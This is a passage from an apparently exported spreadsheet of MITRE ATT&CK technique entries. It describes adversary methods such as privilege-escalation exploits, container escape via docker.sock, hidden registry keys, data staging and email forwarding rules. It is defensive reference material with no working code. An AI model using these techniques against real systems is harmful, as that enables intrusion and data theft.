    <t>Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.(Citation: volexity_0day_sophos_FW)</t>
  </si>
  <si>
    <t>T1068</t>
  </si>
  <si>
    <t>Exploitation for Privilege Escalation</t>
  </si>
  <si>
    <t>Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
When initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods.
Adversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) or [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570).</t>
  </si>
  <si>
    <t>T1591</t>
  </si>
  <si>
    <t>Gather Victim Org Information</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>T1597</t>
  </si>
  <si>
    <t>Search Closed Sources</t>
  </si>
  <si>
    <t>Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).</t>
  </si>
  <si>
    <t>T1596</t>
  </si>
  <si>
    <t>Search Open Technical Databases</t>
  </si>
  <si>
    <t>Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan)
Adversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>T1593</t>
  </si>
  <si>
    <t>Search Open Websites/Domains</t>
  </si>
  <si>
    <t>Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
Adversaries may search in different online sites depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>T1594</t>
  </si>
  <si>
    <t>Search Victim-Owned Websites</t>
  </si>
  <si>
    <t>Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>T1650</t>
  </si>
  <si>
    <t>Acquire Access</t>
  </si>
  <si>
    <t>Adversaries may purchase or otherwise acquire an existing access to a target system or network. A variety of online services and initial access broker networks are available to sell access to previously compromised systems.(Citation: Microsoft Ransomware as a Service)(Citation: CrowdStrike Access Brokers)(Citation: Krebs Access Brokers Fortune 500) In some cases, adversary groups may form partnerships to share compromised systems with each other.(Citation: CISA Karakurt 2022)
Footholds to compromised systems may take a variety of forms, such as access to planted backdoors (e.g., [Web Shell](https://attack.mitre.org/techniques/T1505/003)) or established access via [External Remote Services](https://attack.mitre.org/techniques/T1133). In some cases, access brokers will implant compromised systems with a “load” that can be used to install additional malware for paying customers.(Citation: Microsoft Ransomware as a Service)
By leveraging existing access broker networks rather than developing or obtaining their own initial access capabilities, an adversary can potentially reduce the resources required to gain a foothold on a target network and focus their efforts on later stages of compromise. Adversaries may prioritize acquiring access to systems that have been determined to lack security monitoring or that have high privileges, or systems that belong to organizations in a particular sector.(Citation: Microsoft Ransomware as a Service)(Citation: CrowdStrike Access Brokers)
In some cases, purchasing access to an organization in sectors such as IT contracting, software development, or telecommunications may allow an adversary to compromise additional victims via a [Trusted Relationship](https://attack.mitre.org/techniques/T1199), [Multi-Factor Authentication Interception](https://attack.mitre.org/techniques/T1111), or even [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195).
**Note:** while this technique is distinct from other behaviors such as [Purchase Technical Data](https://attack.mitre.org/techniques/T1597/002) and [Credentials](https://attack.mitre.org/techniques/T1589/001), they may often be used in conjunction (especially where the acquired foothold requires [Valid Accounts](https://attack.mitre.org/techniques/T1078)).</t>
  </si>
  <si>
    <t>T1583</t>
  </si>
  <si>
    <t>Acquire Infrastructure</t>
  </si>
  <si>
    <t>Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase.
Use of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090), including from residential proxy services.(Citation: amnesty_nso_pegasus)(Citation: FBI Proxies Credential Stuffing)(Citation: Mandiant APT29 Microsoft 365 2022) Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.</t>
  </si>
  <si>
    <t>T1586</t>
  </si>
  <si>
    <t>Compromise Accounts</t>
  </si>
  <si>
    <t>Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. 
A variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.(Citation: AnonHBGary)(Citation: Microsoft DEV-0537) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.
Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.
Adversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).</t>
  </si>
  <si>
    <t>T1584</t>
  </si>
  <si>
    <t>Compromise Infrastructure</t>
  </si>
  <si>
    <t>Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
Use of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may also compromise infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090) and/or proxyware services.(Citation: amnesty_nso_pegasus)(Citation: Sysdig Proxyjacking)
By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)</t>
  </si>
  <si>
    <t>T1587</t>
  </si>
  <si>
    <t>Develop Capabilities</t>
  </si>
  <si>
    <t>Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
As with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.</t>
  </si>
  <si>
    <t>T1585</t>
  </si>
  <si>
    <t>Establish Accounts</t>
  </si>
  <si>
    <t>Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
For operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
Establishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>T1588</t>
  </si>
  <si>
    <t>Obtain Capabilities</t>
  </si>
  <si>
    <t>Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
In addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.(Citation: NationsBuying)(Citation: PegasusCitizenLab)
In addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.(Citation: DiginotarCompromise)</t>
  </si>
  <si>
    <t>T1608</t>
  </si>
  <si>
    <t>Stage Capabilities</t>
  </si>
  <si>
    <t>Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Capabilities may also be staged on web services, such as GitHub or Pastebin, or on Platform-as-a-Service (PaaS) offerings that enable users to easily provision applications.(Citation: Volexity Ocean Lotus November 2020)(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)
Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to):
* Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015)(Citation: ATT ScanBox)
* Staging web resources for a link target to be used with spearphishing.(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019)
* Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).(Citation: Volexity Ocean Lotus November 2020)
* Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)).(Citation: DigiCert Install SSL Cert)</t>
  </si>
  <si>
    <t>T1036</t>
  </si>
  <si>
    <t>Masquerading</t>
  </si>
  <si>
    <t>Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site) Masquerading may also include the use of [Proxy](https://attack.mitre.org/techniques/T1090) or VPNs to disguise IP addresses, which can allow adversaries to blend in with normal network traffic and bypass conditional access policies or anti-abuse protections.</t>
  </si>
  <si>
    <t>T1112</t>
  </si>
  <si>
    <t>Modify Registry</t>
  </si>
  <si>
    <t>Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.
Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)
The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.</t>
  </si>
  <si>
    <t>T1647</t>
  </si>
  <si>
    <t>Plist File Modification</t>
  </si>
  <si>
    <t>Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses. macOS applications use plist files, such as the &lt;code&gt;info.plist&lt;/code&gt; file, to store properties and configuration settings that inform the operating system how to handle the application at runtime. Plist files are structured metadata in key-value pairs formatted in XML based on Apple's Core Foundation DTD. Plist files can be saved in text or binary format.(Citation: fileinfo plist file description) 
Adversaries can modify key-value pairs in plist files to influence system behaviors, such as hiding the execution of an application (i.e. [Hidden Window](https://attack.mitre.org/techniques/T1564/003)) or running additional commands for persistence (ex: [Launch Agent](https://attack.mitre.org/techniques/T1543/001)/[Launch Daemon](https://attack.mitre.org/techniques/T1543/004) or [Re-opened Applications](https://attack.mitre.org/techniques/T1547/007)).
For example, adversaries can add a malicious application path to the `~/Library/Preferences/com.apple.dock.plist` file, which controls apps that appear in the Dock. Adversaries can also modify the &lt;code&gt;LSUIElement&lt;/code&gt; key in an application’s &lt;code&gt;info.plist&lt;/code&gt; file  to run the app in the background. Adversaries can also insert key-value pairs to insert environment variables, such as &lt;code&gt;LSEnvironment&lt;/code&gt;, to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation: wardle chp2 persistence)(Citation: eset_osx_flashback)</t>
  </si>
  <si>
    <t>T1052</t>
  </si>
  <si>
    <t>Exfiltration Over Physical Medium</t>
  </si>
  <si>
    <t>Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.</t>
  </si>
  <si>
    <t>T1531</t>
  </si>
  <si>
    <t>Account Access Removal</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)
In Windows, [Net](https://attack.mitre.org/software/S0039) utility, &lt;code&gt;Set-LocalUser&lt;/code&gt; and &lt;code&gt;Set-ADAccountPassword&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be used by adversaries to modify user accounts. In Linux, the &lt;code&gt;passwd&lt;/code&gt; utility may be used to change passwords. Accounts could also be disabled by Group Policy. 
Adversaries who use ransomware or similar attacks may first perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Defacement](https://attack.mitre.org/techniques/T1491), in order to impede incident response/recovery before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) objective. </t>
  </si>
  <si>
    <t>T1611</t>
  </si>
  <si>
    <t>Escape to Host</t>
  </si>
  <si>
    <t>Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview)
There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as `unshare` and `keyctl` to escalate privileges and steal secrets.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20)(Citation: Container Escape)(Citation: Crowdstrike Kubernetes Container Escape)(Citation: Keyctl-unmask)
Additionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as `docker.sock`, to break out of the container via a [Container Administration Command](https://attack.mitre.org/techniques/T1609).(Citation: Container Escape) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open)
Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.</t>
  </si>
  <si>
    <t>T1560.003</t>
  </si>
  <si>
    <t>Archive Collected Data: Archive via Custom Method</t>
  </si>
  <si>
    <t>An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>T1560.002</t>
  </si>
  <si>
    <t>Archive Collected Data: Archive via Library</t>
  </si>
  <si>
    <t>An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
Some archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.</t>
  </si>
  <si>
    <t>T1560.001</t>
  </si>
  <si>
    <t>Archive Collected Data: Archive via Utility</t>
  </si>
  <si>
    <t>Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.
Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as &lt;code&gt;tar&lt;/code&gt; on Linux and macOS or &lt;code&gt;zip&lt;/code&gt; on Windows systems. 
On Windows, &lt;code&gt;diantz&lt;/code&gt; or &lt;code&gt; makecab&lt;/code&gt; may be used to package collected files into a cabinet (.cab) file. &lt;code&gt;diantz&lt;/code&gt; may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) &lt;code&gt;xcopy&lt;/code&gt; on Windows can copy files and directories with a variety of options. Additionally, adversaries may use [certutil](https://attack.mitre.org/software/S0160) to Base64 encode collected data before exfiltration. 
Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage)</t>
  </si>
  <si>
    <t>T1074.001</t>
  </si>
  <si>
    <t>Data Staged: Local Data Staging</t>
  </si>
  <si>
    <t>Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>T1074.002</t>
  </si>
  <si>
    <t>Data Staged: Remote Data Staging</t>
  </si>
  <si>
    <t>Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.</t>
  </si>
  <si>
    <t>T1602.002</t>
  </si>
  <si>
    <t>Data from Configuration Repository: Network Device Configuration Dump</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.
Adversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files.(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis. </t>
  </si>
  <si>
    <t>T1602.001</t>
  </si>
  <si>
    <t>Data from Configuration Repository: SNMP (MIB Dump)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).
The MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers (OID). Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables. SNMP can give administrators great insight in their systems, such as, system information, description of hardware, physical location, and software packages(Citation: SANS Information Security Reading Room Securing SNMP Securing SNMP). The MIB may also contain device operational information, including running configuration, routing table, and interface details.
Adversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) </t>
  </si>
  <si>
    <t>T1213.003</t>
  </si>
  <si>
    <t>Data from Information Repositories: Code Repositories</t>
  </si>
  <si>
    <t>Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.</t>
  </si>
  <si>
    <t>T1213.001</t>
  </si>
  <si>
    <t>Data from Information Repositories: Confluence</t>
  </si>
  <si>
    <t xml:space="preserve">
Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:
* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
</t>
  </si>
  <si>
    <t>T1213.002</t>
  </si>
  <si>
    <t>Data from Information Repositories: Sharepoint</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
</t>
  </si>
  <si>
    <t>T1114.003</t>
  </si>
  <si>
    <t>Email Collection: Email Forwarding Rule</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules)
